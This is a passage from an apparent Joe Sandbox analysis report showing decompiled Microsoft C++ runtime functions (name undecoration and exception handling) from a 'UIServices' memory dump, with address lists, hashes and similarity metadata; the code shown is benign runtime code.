                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                    • API String ID: 0-3207858774
                                                    • Opcode ID: 928b87780ea1a29b4cb16e692e2e24247bd2f1f6e829132aeb6cd054b6efe0a7
                                                    • Instruction ID: 08acc4119dd0ef5b0de31f01e31e7f8557d76db3e3bea9c9e0c629113e4deb9e
                                                    • Opcode Fuzzy Hash: 928b87780ea1a29b4cb16e692e2e24247bd2f1f6e829132aeb6cd054b6efe0a7
                                                    • Instruction Fuzzy Hash: 02919E22B08AAE95EB10DF29DC442B837A4EBC4B44F8442B6DE4D27795DF3CE505CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 80%
                                                    			E00007FFC7FFC23C69D44(void* __ecx, void* __edx, long long __rbx, long long* __rcx, long long __rdi, void* __r8, long long __r9, long long _a8, long long _a24) {
                                                    				void* _v8;
                                                    				char _v24;
                                                    				char _v56;
                                                    				intOrPtr _v64;
                                                    				void* _v72;
                                                    				intOrPtr _t28;
                                                    				void* _t29;
                                                    				void* _t30;
                                                    				void* _t31;
                                                    				void* _t33;
                                                    				char* _t46;
                                                    				long long* _t48;
                                                    				long long* _t52;
                                                    				void* _t54;
                                                    				void* _t59;
                                                    				void* _t61;
                                                    				void* _t62;
                                                    				void* _t64;
                                                    				void* _t65;
                                                    
                                                    				_t59 = __r8;
                                                    				_t38 = __rbx;
                                                    				_t30 = __edx;
                                                    				_t29 = __ecx;
                                                    				_a8 = __rbx;
                                                    				_a24 = __rdi;
                                                    				_t46 =  *0x23c74360; // 0x0
                                                    				r9d = 0;
                                                    				_t52 = __rcx;
                                                    				r8d =  *_t46;
                                                    				if (r8b != 0) goto 0x23c69da7;
                                                    				_t35 = "`unknown ecsu\'";
                                                    				_v64 = 0xe;
                                                    				_v72 = "`unknown ecsu\'";
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x30], xmm0");
                                                    				E00007FFC7FFC23C66CF4("`unknown ecsu\'",  &_v72,  &_v56);
                                                    				r8d = 1;
                                                    				_t48 = __rcx;
                                                    				E00007FFC7FFC23C66FCC(_t35, __rcx);
                                                    				goto 0x23c69e01;
                                                    				_v72 = __r9;
                                                    				_v64 = r9d;
                                                    				_t33 = r8b - 0x57;
                                                    				if (_t33 != 0) goto 0x23c69e16;
                                                    				if (_t33 != 0) goto 0x23c69e2d;
                                                    				 *0x23c74360 = _t48 + 1;
                                                    				if (r8b != 0x57) goto 0x23c69dde;
                                                    				E00007FFC7FFC23C69F24(_t30, _t31, __rbx,  &_v24, _t52, _t54);
                                                    				E00007FFC7FFC23C6C134(_t29, _t31, _t35, _t38,  &_v56, _t48 + 1, _t52, _t54, _t59, _t61, _t62, _t64, _t65);
                                                    				E00007FFC7FFC23C67078(_t29,  &_v72,  &_v56, _t59);
                                                    				 *_t52 = _v72;
                                                    				_t28 = _v64;
                                                    				 *((intOrPtr*)(_t52 + 8)) = _t28;
                                                    				return _t28;
                                                    			}






















                                                    0x7ffc23c69d44
                                                    0x7ffc23c69d44
                                                    0x7ffc23c69d44
                                                    0x7ffc23c69d44
                                                    0x7ffc23c69d44
                                                    0x7ffc23c69d49
                                                    0x7ffc23c69d56
                                                    0x7ffc23c69d5d
                                                    0x7ffc23c69d60
                                                    0x7ffc23c69d63
                                                    0x7ffc23c69d6a
                                                    0x7ffc23c69d6c
                                                    0x7ffc23c69d73
                                                    0x7ffc23c69d7a
                                                    0x7ffc23c69d82
                                                    0x7ffc23c69d8a
                                                    0x7ffc23c69d8f
                                                    0x7ffc23c69d94
                                                    0x7ffc23c69d9a
                                                    0x7ffc23c69da0
                                                    0x7ffc23c69da5
                                                    0x7ffc23c69da7
                                                    0x7ffc23c69dab
                                                    0x7ffc23c69daf
                                                    0x7ffc23c69db3
                                                    0x7ffc23c69dc3
                                                    0x7ffc23c69dc8
                                                    0x7ffc23c69dd3
                                                    0x7ffc23c69dd9
                                                    0x7ffc23c69de2
                                                    0x7ffc23c69def
                                                    0x7ffc23c69df8
                                                    0x7ffc23c69dfb
                                                    0x7ffc23c69dfe
                                                    0x7ffc23c69e15

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator+=
                                                    • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                    • API String ID: 179159573-1464470183
                                                    • Opcode ID: bf3689c0f9cd75041bb0a8ea9a574fd0039b8fb0237401dcbb7bc633705ecfd6
                                                    • Instruction ID: 4b841177125f0faa1059f3625b115a53ca9bb099462a13fb16101b35ef2d1054
                                                    • Opcode Fuzzy Hash: bf3689c0f9cd75041bb0a8ea9a574fd0039b8fb0237401dcbb7bc633705ecfd6
                                                    • Instruction Fuzzy Hash: 18514B32F18A2A89FB18CB69EC445BC37B8FB44388F500279DE0D66A59DF39E515CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E00007FFC7FFC23C68558(void* __ecx, void* __edx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                    				void* _v24;
                                                    				char _v40;
                                                    				char _v56;
                                                    				char _v72;
                                                    				intOrPtr _v80;
                                                    				char _v88;
                                                    				intOrPtr _v96;
                                                    				char _v104;
                                                    				char _v112;
                                                    				char _v120;
                                                    				void* __r14;
                                                    				void* _t66;
                                                    				void* _t88;
                                                    				void* _t90;
                                                    				void* _t98;
                                                    				intOrPtr* _t106;
                                                    				intOrPtr* _t108;
                                                    				intOrPtr* _t146;
                                                    				intOrPtr* _t155;
                                                    				long long* _t158;
                                                    				void* _t169;
                                                    				void* _t170;
                                                    				void* _t172;
                                                    				long long _t173;
                                                    
                                                    				_t112 = __rbx;
                                                    				_t90 = __edx;
                                                    				_t88 = __ecx;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_a24 = __rdi;
                                                    				_t106 =  *0x23c74360; // 0x0
                                                    				r15d = 0;
                                                    				_t155 = __rdx;
                                                    				_t158 = __rcx;
                                                    				if ( *_t106 == r15b) goto 0x23c686d3;
                                                    				_t66 = E00007FFC7FFC23C6AB6C(__rdx);
                                                    				r14d = _t66;
                                                    				_t98 = _t66;
                                                    				if (_t98 < 0) goto 0x23c6873f;
                                                    				if (_t98 == 0) goto 0x23c6873f;
                                                    				_v120 = _t173;
                                                    				_v112 = r15d;
                                                    				if (( *(__rdx + 8) & 0x00000800) == 0) goto 0x23c685e0;
                                                    				_v96 = 2;
                                                    				_v104 = 0x23c70ea0;
                                                    				asm("movaps xmm0, [ebp-0x50]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
                                                    				E00007FFC7FFC23C66FF8(_t90, __edi, 0x23c70ea0, __rbx,  &_v120,  &_v104, _t158);
                                                    				goto 0x23c68643;
                                                    				r14d = r14d - 1;
                                                    				if (r14d == 0) goto 0x23c68649;
                                                    				_t108 =  *0x23c74360; // 0x0
                                                    				if ( *_t108 == r15b) goto 0x23c68649;
                                                    				E00007FFC7FFC23C69BAC(0, _t112,  &_v56, _t155, _t158, _t169, _t170, _t172);
                                                    				_v104 = _t173;
                                                    				_v96 = r15d;
                                                    				_t113 = _t108;
                                                    				E00007FFC7FFC23C68150(0x5b, _t108, _t108,  &_v104);
                                                    				E00007FFC7FFC23C66F74( &_v104,  &_v72, _t108);
                                                    				r8b = 0x5d;
                                                    				E00007FFC7FFC23C66FA0( &_v72,  &_v40);
                                                    				E00007FFC7FFC23C67078(_t88,  &_v120, _t108, _t113);
                                                    				if (_v112 - 1 <= 0) goto 0x23c685e0;
                                                    				if ( *_t155 == _t173) goto 0x23c686b0;
                                                    				if (( *(_t155 + 8) & 0x00000800) == 0) goto 0x23c68660;
                                                    				goto 0x23c6869a;
                                                    				_v104 = _t173;
                                                    				_v96 = r15d;
                                                    				E00007FFC7FFC23C68150(0x28, _t108, _t113,  &_v104);
                                                    				E00007FFC7FFC23C66F74( &_v104,  &_v72, _t155);
                                                    				r8b = 0x29;
                                                    				E00007FFC7FFC23C66FA0( &_v72,  &_v40);
                                                    				E00007FFC7FFC23C66F74(_t108,  &_v56,  &_v120);
                                                    				_v120 =  *_t108;
                                                    				_v112 =  *((intOrPtr*)(_t108 + 8));
                                                    				_t146 =  &_v120;
                                                    				E00007FFC7FFC23C6B428(0x28, __edi, _t108, _t113,  &_v88, _t146, _t155, _t158,  &_v120, _t172);
                                                    				asm("bts ecx, 0xb");
                                                    				 *((intOrPtr*)(_t158 + 8)) = _v80;
                                                    				 *_t158 = _v88;
                                                    				goto 0x23c6877f;
                                                    				if ( *_t146 == _t173) goto 0x23c6873f;
                                                    				_t110 = ")[";
                                                    				_v80 = 2;
                                                    				_v88 = ")[";
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x30], xmm0");
                                                    				_v104 = _t173;
                                                    				_v96 = r15d;
                                                    				E00007FFC7FFC23C68150(0x28, ")[", _t113,  &_v104);
                                                    				E00007FFC7FFC23C66F74( &_v104,  &_v88, _t155);
                                                    				E00007FFC7FFC23C66F48( &_v88,  &_v40,  &_v72);
                                                    				r8d = 1;
                                                    				E00007FFC7FFC23C66FCC(")[",  &_v56);
                                                    				goto 0x23c68769;
                                                    				_v104 = _t173;
                                                    				_v96 = r15d;
                                                    				E00007FFC7FFC23C68150(0x5b, _t110, _t113,  &_v104);
                                                    				r8d = 1;
                                                    				E00007FFC7FFC23C66FCC( &_v104,  &_v40);
                                                    				r8b = 0x5d;
                                                    				E00007FFC7FFC23C66FA0(_t110,  &_v56);
                                                    				return E00007FFC7FFC23C68898(0x5b, __edi, _t113, _t158, _t110, _t155, _t158, _t172);
                                                    			}



























                                                    0x7ffc23c68558
                                                    0x7ffc23c68558
                                                    0x7ffc23c68558
                                                    0x7ffc23c68558
                                                    0x7ffc23c6855d
                                                    0x7ffc23c68562
                                                    0x7ffc23c68576
                                                    0x7ffc23c6857d
                                                    0x7ffc23c68580
                                                    0x7ffc23c68583
                                                    0x7ffc23c68589
                                                    0x7ffc23c6858f
                                                    0x7ffc23c68594
                                                    0x7ffc23c68597
                                                    0x7ffc23c68599
                                                    0x7ffc23c6859f
                                                    0x7ffc23c685ac
                                                    0x7ffc23c685b0
                                                    0x7ffc23c685b4
                                                    0x7ffc23c685b6
                                                    0x7ffc23c685c4
                                                    0x7ffc23c685cc
                                                    0x7ffc23c685d4
                                                    0x7ffc23c685d9
                                                    0x7ffc23c685de
                                                    0x7ffc23c685e3
                                                    0x7ffc23c685e8
                                                    0x7ffc23c685ea
                                                    0x7ffc23c685f4
                                                    0x7ffc23c685fc
                                                    0x7ffc23c68603
                                                    0x7ffc23c6860b
                                                    0x7ffc23c6860f
                                                    0x7ffc23c68612
                                                    0x7ffc23c68622
                                                    0x7ffc23c68627
                                                    0x7ffc23c68632
                                                    0x7ffc23c6863e
                                                    0x7ffc23c68647
                                                    0x7ffc23c6864c
                                                    0x7ffc23c68655
                                                    0x7ffc23c6865e
                                                    0x7ffc23c68662
                                                    0x7ffc23c6866a
                                                    0x7ffc23c6866e
                                                    0x7ffc23c6867e
                                                    0x7ffc23c68683
                                                    0x7ffc23c6868e
                                                    0x7ffc23c6869e
                                                    0x7ffc23c686a6
                                                    0x7ffc23c686ad
                                                    0x7ffc23c686b0
                                                    0x7ffc23c686b8
                                                    0x7ffc23c686c4
                                                    0x7ffc23c686c8
                                                    0x7ffc23c686cb
                                                    0x7ffc23c686ce
                                                    0x7ffc23c686d6
                                                    0x7ffc23c686d8
                                                    0x7ffc23c686df
                                                    0x7ffc23c686e6
                                                    0x7ffc23c686ee
                                                    0x7ffc23c686f4
                                                    0x7ffc23c686f9
                                                    0x7ffc23c686fd
                                                    0x7ffc23c68701
                                                    0x7ffc23c68711
                                                    0x7ffc23c68722
                                                    0x7ffc23c68727
                                                    0x7ffc23c68734
                                                    0x7ffc23c6873d
                                                    0x7ffc23c68741
                                                    0x7ffc23c68749
                                                    0x7ffc23c6874d
                                                    0x7ffc23c68752
                                                    0x7ffc23c68760
                                                    0x7ffc23c68769
                                                    0x7ffc23c6876f
                                                    0x7ffc23c6879e

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: 7c905d25df6533693e4543565a52052680a713f17b26df085205557a8d408556
                                                    • Instruction ID: 5ebbf1a0873e40eab9b91b514a0d3cf020736de7c171effdaa9166b96cbd19c5
                                                    • Opcode Fuzzy Hash: 7c905d25df6533693e4543565a52052680a713f17b26df085205557a8d408556
                                                    • Instruction Fuzzy Hash: A6615C72B18B6A98FB00DBA8DC801EC27B5FB84788B404675DE0D2BA89DF78D555CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 63%
                                                    			E00007FFC7FFC23C62F2C(intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9) {
                                                    				void* __rbx;
                                                    				void* __rdi;
                                                    				void* __rsi;
                                                    				void* __rbp;
                                                    				void* _t163;
                                                    				intOrPtr _t164;
                                                    				intOrPtr _t166;
                                                    				intOrPtr _t203;
                                                    				void* _t204;
                                                    				intOrPtr _t208;
                                                    				void* _t209;
                                                    				signed long long _t248;
                                                    				signed long long _t249;
                                                    				signed char _t250;
                                                    				intOrPtr* _t252;
                                                    				long long _t254;
                                                    				long long _t262;
                                                    				long long _t264;
                                                    				signed char* _t266;
                                                    				long long _t278;
                                                    				long long _t297;
                                                    				long long _t298;
                                                    				intOrPtr* _t299;
                                                    				void* _t302;
                                                    				void* _t303;
                                                    				void* _t304;
                                                    				void* _t305;
                                                    				signed long long _t306;
                                                    				long long _t323;
                                                    				long long _t325;
                                                    				signed char* _t326;
                                                    				intOrPtr _t331;
                                                    
                                                    				_t304 = _t305 - 0x88;
                                                    				_t306 = _t305 - 0x188;
                                                    				_t248 =  *0x23c74038; // 0x577607bbd382
                                                    				_t249 = _t248 ^ _t306;
                                                    				 *(_t304 + 0x70) = _t249;
                                                    				_t326 =  *((intOrPtr*)(_t304 + 0xf0));
                                                    				 *((long long*)(_t306 + 0x78)) = __rdx;
                                                    				_t266 = _t326;
                                                    				 *((long long*)(_t304 - 0x60)) =  *((intOrPtr*)(_t304 + 0x108));
                                                    				_t303 = __r9;
                                                    				 *((char*)(_t306 + 0x60)) = 0;
                                                    				 *((char*)(_t306 + 0x61)) = 0;
                                                    				E00007FFC7FFC23C6E1E0(_t266, __r9, __r9);
                                                    				if ( *((intOrPtr*)(__r9 + 0x48)) == 0) goto 0x23c62fad;
                                                    				E00007FFC7FFC23C664B0(_t249);
                                                    				if ( *((intOrPtr*)(_t249 + 0x78)) != 0xfffffffe) goto 0x23c633e4;
                                                    				goto 0x23c62fcc;
                                                    				E00007FFC7FFC23C664B0(_t249);
                                                    				if ( *((intOrPtr*)(_t249 + 0x78)) == 0xfffffffe) goto 0x23c62fcc;
                                                    				E00007FFC7FFC23C664B0(_t249);
                                                    				_t208 =  *((intOrPtr*)(_t249 + 0x78));
                                                    				E00007FFC7FFC23C664B0(_t249);
                                                    				 *((intOrPtr*)(_t249 + 0x78)) = 0xfffffffe;
                                                    				if (_t208 - 0xffffffff < 0) goto 0x23c633e4;
                                                    				if (_t326[8] == 0) goto 0x23c6300c;
                                                    				_t250 = _t266[0x7ffc23c70410];
                                                    				goto 0x23c6300e;
                                                    				if (_t208 >= 0) goto 0x23c633e4;
                                                    				if ( *__rcx != 0xe06d7363) goto 0x23c630e8;
                                                    				if ( *((intOrPtr*)(__rcx + 0x18)) != 4) goto 0x23c630e8;
                                                    				if ( *((intOrPtr*)(__rcx + 0x20)) - 0x19930520 - 2 > 0) goto 0x23c630e8;
                                                    				if ( *((long long*)(__rcx + 0x30)) != 0) goto 0x23c630e8;
                                                    				E00007FFC7FFC23C664B0(_t250);
                                                    				if ( *((long long*)(_t250 + 0x20)) == 0) goto 0x23c633eb;
                                                    				E00007FFC7FFC23C664B0(_t250);
                                                    				_t264 =  *((intOrPtr*)(_t250 + 0x20));
                                                    				E00007FFC7FFC23C664B0(_t250);
                                                    				 *((char*)(_t306 + 0x60)) = 1;
                                                    				_t325 =  *((intOrPtr*)(_t250 + 0x28));
                                                    				E00007FFC7FFC23C6F084(_t250,  *((intOrPtr*)(_t264 + 0x38)));
                                                    				if ( *_t264 != 0xe06d7363) goto 0x23c6309e;
                                                    				if ( *((intOrPtr*)(_t264 + 0x18)) != 4) goto 0x23c6309e;
                                                    				if ( *((intOrPtr*)(_t264 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23c6309e;
                                                    				if ( *((long long*)(_t264 + 0x30)) == 0) goto 0x23c633e4;
                                                    				E00007FFC7FFC23C664B0(_t250);
                                                    				if ( *(_t250 + 0x38) == 0) goto 0x23c630e8;
                                                    				E00007FFC7FFC23C664B0(_t250);
                                                    				E00007FFC7FFC23C664B0(_t250);
                                                    				 *(_t250 + 0x38) =  *(_t250 + 0x38) & 0x00000000;
                                                    				if (E00007FFC7FFC23C64E48(_t250, _t264, _t264,  *(_t250 + 0x38), __r9) != 0) goto 0x23c630e3;
                                                    				if (E00007FFC7FFC23C64F38(_t250, _t264,  *(_t250 + 0x38), __r9, _t304) != 0) goto 0x23c6340b;
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				E00007FFC7FFC23C640EC(_t304 - 0x10, _t326,  *((intOrPtr*)(__r9 + 8)));
                                                    				if ( *_t264 != 0xe06d7363) goto 0x23c633a0;
                                                    				if ( *((intOrPtr*)(_t264 + 0x18)) != 4) goto 0x23c633a0;
                                                    				if ( *((intOrPtr*)(_t264 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23c633a0;
                                                    				if ( *((intOrPtr*)(_t304 - 0x10)) <= 0) goto 0x23c63372;
                                                    				 *((intOrPtr*)(_t306 + 0x28)) =  *((intOrPtr*)(_t304 + 0x100));
                                                    				 *(_t306 + 0x20) = _t326;
                                                    				r8d = _t208;
                                                    				_t163 = E00007FFC7FFC23C6EA68(_t264, _t304 - 0x58, _t304 - 0x10, _t302, _t303);
                                                    				asm("movups xmm0, [ebp-0x58]");
                                                    				asm("movdqu [ebp-0x78], xmm0");
                                                    				asm("psrldq xmm0, 0x8");
                                                    				asm("movd eax, xmm0");
                                                    				if (_t163 -  *((intOrPtr*)(_t304 - 0x40)) >= 0) goto 0x23c63372;
                                                    				_t164 =  *((intOrPtr*)(_t304 - 0x70));
                                                    				 *((long long*)(_t304 - 0x80)) =  *((intOrPtr*)(_t304 - 0x58));
                                                    				 *((intOrPtr*)(_t306 + 0x68)) = _t164;
                                                    				asm("inc ecx");
                                                    				asm("dec ax");
                                                    				asm("movups [ebp-0x78], xmm0");
                                                    				if (_t164 - _t208 > 0) goto 0x23c632d1;
                                                    				if (_t208 - _t164 > 0) goto 0x23c632d1;
                                                    				_t252 =  *((intOrPtr*)(_t303 + 0x10));
                                                    				r9d =  *_t252;
                                                    				E00007FFC7FFC23C64070(_t252, _t304 + 0x20, _t304 - 0x78,  *((intOrPtr*)(_t303 + 8)));
                                                    				_t166 =  *((intOrPtr*)(_t304 + 0x20));
                                                    				r12d = 0;
                                                    				 *((intOrPtr*)(_t306 + 0x64)) = r12d;
                                                    				 *((intOrPtr*)(_t306 + 0x6c)) = _t166;
                                                    				if (_t166 == 0) goto 0x23c632ca;
                                                    				asm("movups xmm0, [ebp+0x38]");
                                                    				asm("movups xmm1, [ebp+0x48]");
                                                    				asm("movups [ebp-0x38], xmm0");
                                                    				asm("movsd xmm0, [ebp+0x58]");
                                                    				asm("movsd [ebp-0x18], xmm0");
                                                    				asm("movups [ebp-0x28], xmm1");
                                                    				E00007FFC7FFC23C6F058(_t252);
                                                    				_t254 = _t252 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x30)) + 0xc));
                                                    				 *((long long*)(_t306 + 0x70)) = _t254;
                                                    				E00007FFC7FFC23C6F058(_t254);
                                                    				r15d =  *((intOrPtr*)(_t254 +  *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x30)) + 0xc))));
                                                    				if (r15d <= 0) goto 0x23c63250;
                                                    				E00007FFC7FFC23C6F058(_t254);
                                                    				_t323 = _t254 +  *((intOrPtr*)( *((intOrPtr*)(_t306 + 0x70))));
                                                    				if (E00007FFC7FFC23C63A78(_t209, _t264, _t304 - 0x38, _t323, _t302, _t303,  *((intOrPtr*)(_t264 + 0x30))) != 0) goto 0x23c6326d;
                                                    				 *((long long*)(_t306 + 0x70)) =  *((long long*)(_t306 + 0x70)) + 4;
                                                    				r15d = r15d - 1;
                                                    				if (r15d > 0) goto 0x23c63216;
                                                    				r12d =  *((intOrPtr*)(_t306 + 0x64));
                                                    				E00007FFC7FFC23C64700( *((intOrPtr*)(_t306 + 0x70)), _t304 + 0x20);
                                                    				r12d = r12d + 1;
                                                    				 *((intOrPtr*)(_t306 + 0x64)) = r12d;
                                                    				if (r12d ==  *((intOrPtr*)(_t306 + 0x6c))) goto 0x23c632c6;
                                                    				goto 0x23c631cd;
                                                    				 *((char*)(_t306 + 0x58)) =  *((intOrPtr*)(_t304 + 0xf8));
                                                    				_t278 = _t264;
                                                    				 *((char*)(_t306 + 0x50)) =  *((intOrPtr*)(_t306 + 0x60));
                                                    				 *((long long*)(_t306 + 0x48)) =  *((intOrPtr*)(_t304 - 0x60));
                                                    				 *((intOrPtr*)(_t306 + 0x40)) =  *((intOrPtr*)(_t304 + 0x100));
                                                    				 *((long long*)(_t306 + 0x38)) = _t304 - 0x78;
                                                    				 *((long long*)(_t306 + 0x30)) = _t323;
                                                    				 *((long long*)(_t306 + 0x28)) = _t304 - 0x38;
                                                    				 *(_t306 + 0x20) = _t326;
                                                    				 *((char*)(_t306 + 0x61)) = 1;
                                                    				E00007FFC7FFC23C62970(_t266[0x7ffc23c70420], _t264, _t278,  *((intOrPtr*)(_t306 + 0x78)), _t325, _t303);
                                                    				_t331 =  *((intOrPtr*)(_t304 - 0x80));
                                                    				_t297 =  *((intOrPtr*)(_t331 + 8)) -  *((char*)(_t278 + 0x7ffc23c70410));
                                                    				 *((long long*)(_t331 + 8)) = _t297;
                                                    				 *(_t331 + 0x18) =  *(_t297 - 4) >>  *(_t278 + 0x7ffc23c70420);
                                                    				_t298 = _t297 -  *((char*)(_t278 + 0x7ffc23c70410));
                                                    				 *((long long*)(_t331 + 8)) = _t298;
                                                    				 *(_t331 + 0x1c) =  *(_t298 - 4) >>  *(_t278 + 0x7ffc23c70420);
                                                    				_t299 = _t298 -  *((char*)(_t278 + 0x7ffc23c70410));
                                                    				 *(_t331 + 0x20) =  *(_t299 - 4) >>  *(_t278 + 0x7ffc23c70420);
                                                    				_t117 = _t299 + 4; // 0x4
                                                    				_t262 = _t117;
                                                    				 *((long long*)(_t331 + 8)) = _t299;
                                                    				 *((intOrPtr*)(_t331 + 0x24)) =  *_t299;
                                                    				_t203 =  *((intOrPtr*)(_t306 + 0x68)) + 1;
                                                    				 *((long long*)(_t331 + 8)) = _t262;
                                                    				 *((intOrPtr*)(_t306 + 0x68)) = _t203;
                                                    				if (_t203 -  *((intOrPtr*)(_t304 - 0x40)) < 0) goto 0x23c6317c;
                                                    				if ( *((char*)(_t306 + 0x61)) != 0) goto 0x23c633d8;
                                                    				if (( *_t326 & 0x00000040) == 0) goto 0x23c633d8;
                                                    				if (E00007FFC7FFC23C6E798(_t326) != 0) goto 0x23c633d8;
                                                    				E00007FFC7FFC23C664B0(_t262);
                                                    				 *((long long*)(_t262 + 0x20)) = _t264;
                                                    				E00007FFC7FFC23C664B0(_t262);
                                                    				 *((long long*)(_t262 + 0x28)) = _t325;
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				if ( *((intOrPtr*)(_t304 - 0x10)) <= 0) goto 0x23c633d8;
                                                    				if ( *((char*)(_t304 + 0xf8)) != 0) goto 0x23c633e4;
                                                    				 *((long long*)(_t306 + 0x38)) = _t323;
                                                    				 *((intOrPtr*)(_t306 + 0x30)) =  *((intOrPtr*)(_t304 + 0x100));
                                                    				 *((intOrPtr*)(_t306 + 0x28)) = _t208;
                                                    				 *(_t306 + 0x20) = _t326;
                                                    				E00007FFC7FFC23C63648(_t204, _t264, _t331, _t325, _t303);
                                                    				E00007FFC7FFC23C664B0(_t262);
                                                    				if ( *((long long*)(_t262 + 0x38)) == 0) goto 0x23c633eb;
                                                    				abort();
                                                    				asm("int3");
                                                    				return E00007FFC7FFC23C6F5B0(_t203, _t262,  *(_t304 + 0x70) ^ _t306, _t331);
                                                    			}



































                                                    0x7ffc23c62f39
                                                    0x7ffc23c62f41
                                                    0x7ffc23c62f48
                                                    0x7ffc23c62f4f
                                                    0x7ffc23c62f52
                                                    0x7ffc23c62f56
                                                    0x7ffc23c62f6a
                                                    0x7ffc23c62f6f
                                                    0x7ffc23c62f75
                                                    0x7ffc23c62f79
                                                    0x7ffc23c62f7c
                                                    0x7ffc23c62f84
                                                    0x7ffc23c62f89
                                                    0x7ffc23c62f94
                                                    0x7ffc23c62f96
                                                    0x7ffc23c62f9f
                                                    0x7ffc23c62fab
                                                    0x7ffc23c62fad
                                                    0x7ffc23c62fb6
                                                    0x7ffc23c62fb8
                                                    0x7ffc23c62fbd
                                                    0x7ffc23c62fc0
                                                    0x7ffc23c62fc5
                                                    0x7ffc23c62fcf
                                                    0x7ffc23c62fe1
                                                    0x7ffc23c62ff1
                                                    0x7ffc23c6300a
                                                    0x7ffc23c63010
                                                    0x7ffc23c6301c
                                                    0x7ffc23c63026
                                                    0x7ffc23c63037
                                                    0x7ffc23c63042
                                                    0x7ffc23c63048
                                                    0x7ffc23c63052
                                                    0x7ffc23c63058
                                                    0x7ffc23c6305d
                                                    0x7ffc23c63061
                                                    0x7ffc23c6306a
                                                    0x7ffc23c6306f
                                                    0x7ffc23c63073
                                                    0x7ffc23c6307e
                                                    0x7ffc23c63084
                                                    0x7ffc23c63091
                                                    0x7ffc23c63098
                                                    0x7ffc23c6309e
                                                    0x7ffc23c630a8
                                                    0x7ffc23c630aa
                                                    0x7ffc23c630b3
                                                    0x7ffc23c630be
                                                    0x7ffc23c630ca
                                                    0x7ffc23c630d6
                                                    0x7ffc23c630dc
                                                    0x7ffc23c630e2
                                                    0x7ffc23c630f3
                                                    0x7ffc23c630fe
                                                    0x7ffc23c63108
                                                    0x7ffc23c63119
                                                    0x7ffc23c63123
                                                    0x7ffc23c63133
                                                    0x7ffc23c6313e
                                                    0x7ffc23c63143
                                                    0x7ffc23c63146
                                                    0x7ffc23c6314b
                                                    0x7ffc23c6314f
                                                    0x7ffc23c63154
                                                    0x7ffc23c63159
                                                    0x7ffc23c63160
                                                    0x7ffc23c63171
                                                    0x7ffc23c63174
                                                    0x7ffc23c63178
                                                    0x7ffc23c6317c
                                                    0x7ffc23c63181
                                                    0x7ffc23c63186
                                                    0x7ffc23c6318c
                                                    0x7ffc23c63198
                                                    0x7ffc23c6319e
                                                    0x7ffc23c631ae
                                                    0x7ffc23c631b1
                                                    0x7ffc23c631b6
                                                    0x7ffc23c631b9
                                                    0x7ffc23c631bc
                                                    0x7ffc23c631c1
                                                    0x7ffc23c631c7
                                                    0x7ffc23c631cd
                                                    0x7ffc23c631d1
